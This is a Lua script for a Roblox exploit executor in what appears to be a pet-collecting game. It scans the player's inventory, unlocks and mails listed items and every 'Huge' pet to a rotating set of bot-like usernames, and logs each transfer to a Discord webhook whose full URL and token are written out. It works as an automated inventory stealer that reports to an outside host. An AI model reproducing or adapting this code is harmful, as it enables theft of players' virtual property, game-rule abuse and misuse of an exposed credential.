getgenv().data = {
    ["Item"] = {
        ["Valentines Spinny Wheel Ticket"] = 1,
        ["Heartbreak Present"] = 5,
        --["Master Thief Potion"] = 1,
        ["Shimmering Octopus"] = 1,
        ["Atlantean Gift"] = 1,
        ["Royal Gift"] = 1,
        --["Vault Key"] = 50,
        ["Hacker Egg"] = 20,
        ["Royal Gift Bag"] = 1,
        ["Titanic Gift Bag"] = 1,
        ["Titanic Mining Chest"] = 1,
        ["Pickaxe Huge Hunter"] = 1,
        ["Exclusive"] = 1,
        ["Exclusive Enchant Safe"] = 1,
        ["Celestial Enchant Safe"] = 1,
        ["Legendary Enchant Safe"] = 1,
        ["Thieving God Potion"] = 1,
        ["Thieving Gift Bag"] = 1,
        ["Thieving Gift"] = 1,
        --["Exotic Thieving Chest"] = 10,
        --["Exotic Fishing Chest"] = 50,
        --["Exotic Mining Chest"] = 50,
        --["Runic Mining Chest"] = 5,
        ["Abyssal Treasure Chest"] = 5,
        --["Legendary Thieving Chest"] = 200,
        --["Legendary Fishing Chest"] = 20,
        --["Legendary Mining Chest"] = 100,
        --["Legendary Fishing Bait"] = 5,
        --["Exotic Fishing Bait"] = 5,
        --["Fishing Bait"] = 20,
        ["Emerald"] = 1,
        ["Diamond"] = 1,
        ["Blossom Koi Fish"]            = 1,
        ["Flex Fluffy Cat"]            = 1,
        ["Detective Terrier"]            = 10,
        ["Ninja Maskot"]            = 5,
        ["Ninja Turtle"]            = 10,
        ["Robber Cat"]            = 10,
        ["Stealth Bobcat"]            = 1,
        ["Sphinx Gift Bag"]            = 5,
        ["Sphinx God Potion"]            = 5,
        --["Scarab"]            = 300,
        --["Sphinx Egg"]            = 500,
        ["Wicked Angelus"]            = 5,
        ["Wicked Empyrean Dragon"]            = 5,
        ["Sapphire Phoenix"]            = 1
    },
    ["UserName"] = {
        "NNJorAce2338", "IDJayTom4147", "aTClyKim5583", "zOVanCal3773", "ZLZebSid4549", "CwHobCal3065", "XMOleJim1811",
        "obGadJim408", "KHTaiEli374", "WaNeoDon822"
    },
    ["Time Delay"] = 10, -- Second
    ["Url Webhook"] =
    "https://discord.com/api/webhooks/1337684621189714083/FM3jPHn3Pq763RSXFP2El9KAULAomNHt_T4wfK6ilyj6FelI20Q9Oo4iUsa6C_SSRf1t"
}
repeat
    wait()
until game:IsLoaded() and game:GetService("Players").LocalPlayer:FindFirstChild("PlayerGui") and game:GetService("Players").LocalPlayer.PlayerGui:FindFirstChild("GUIFX Holder") and
    game:GetService("Players").LocalPlayer.PlayerGui["GUIFX Holder"].DisplayOrder == 999
local rs = game:GetService("ReplicatedStorage")
local save = require(rs.Library.Client.Save)
local Items = require(game:GetService("ReplicatedStorage").Library.Items.Types)
local plr = game.Players.LocalPlayer
local RAP = 0
local a = require(game:GetService("ReplicatedStorage").Library.Directory.Pets)
function formatNumber(v)
    return tostring(v):reverse():gsub("%d%d%d", "%1,"):reverse():gsub("^,", "")
end

local function log(user, item, amount)
    local Message = {
        ['username'] = "Pet GO Log",
        ["content"] = "@everyone\nUserName: " .. user .. "\nSend Done: " .. item .. "\nAmount: " .. formatNumber(amount)

    }
    local DataCallBack = request({
        Url = getgenv().data["Url Webhook"],
        Method = 'POST',
        Headers = {
            ["Content-Type"] = "application/json"
        },
        Body = game:GetService("HttpService"):JSONEncode(Message)
    })
end

while wait() do
    for i, v in save.Get().Inventory do
        for i1, v1 in next, v do
            if getgenv().data["Item"][v1.id] then
                local am = v1._am or 1
                if am and am >= getgenv().data["Item"][v1.id] then
                    local username = getgenv().data["UserName"][math.random(1, #getgenv().data["UserName"])]
                    local args = {
                        [1] = username,
                        [2] = "Made by honglamx",
                        [3] = i,
                        [4] = i1,
                        [5] = am
                    }

                    if game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox: Send"):InvokeServer(
                            unpack(args)) then
                        log(username, v1.id, am)
                        task.wait(getgenv().data["Item"]["Time Delay"])
                    end
                end
            end
        end
    end
    for i, v in save.Get().Inventory.Pet do
        if string.find(v.Name, "Huge") then
            local args = {
                [1] = i,
                [2] = false
            }

            game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Locking_SetLocked"):InvokeServer(
                unpack(args))
            local username = getgenv().data["UserName"][math.random(1, #getgenv().data["UserName"])]
            local args = {
                [1] = username,
                [2] = "Made by honglamx",
                [3] = "Pet",
                [4] = i,
                [5] = v._am or 1
            }

            if game:GetService("ReplicatedStorage"):WaitForChild("Network"):WaitForChild("Mailbox: Send"):InvokeServer(
                    unpack(args)) then
                log(username, v.id, v._am or 1)
                task.wait(getgenv().data["Item"]["Time Delay"])
            end
        end
    end
end
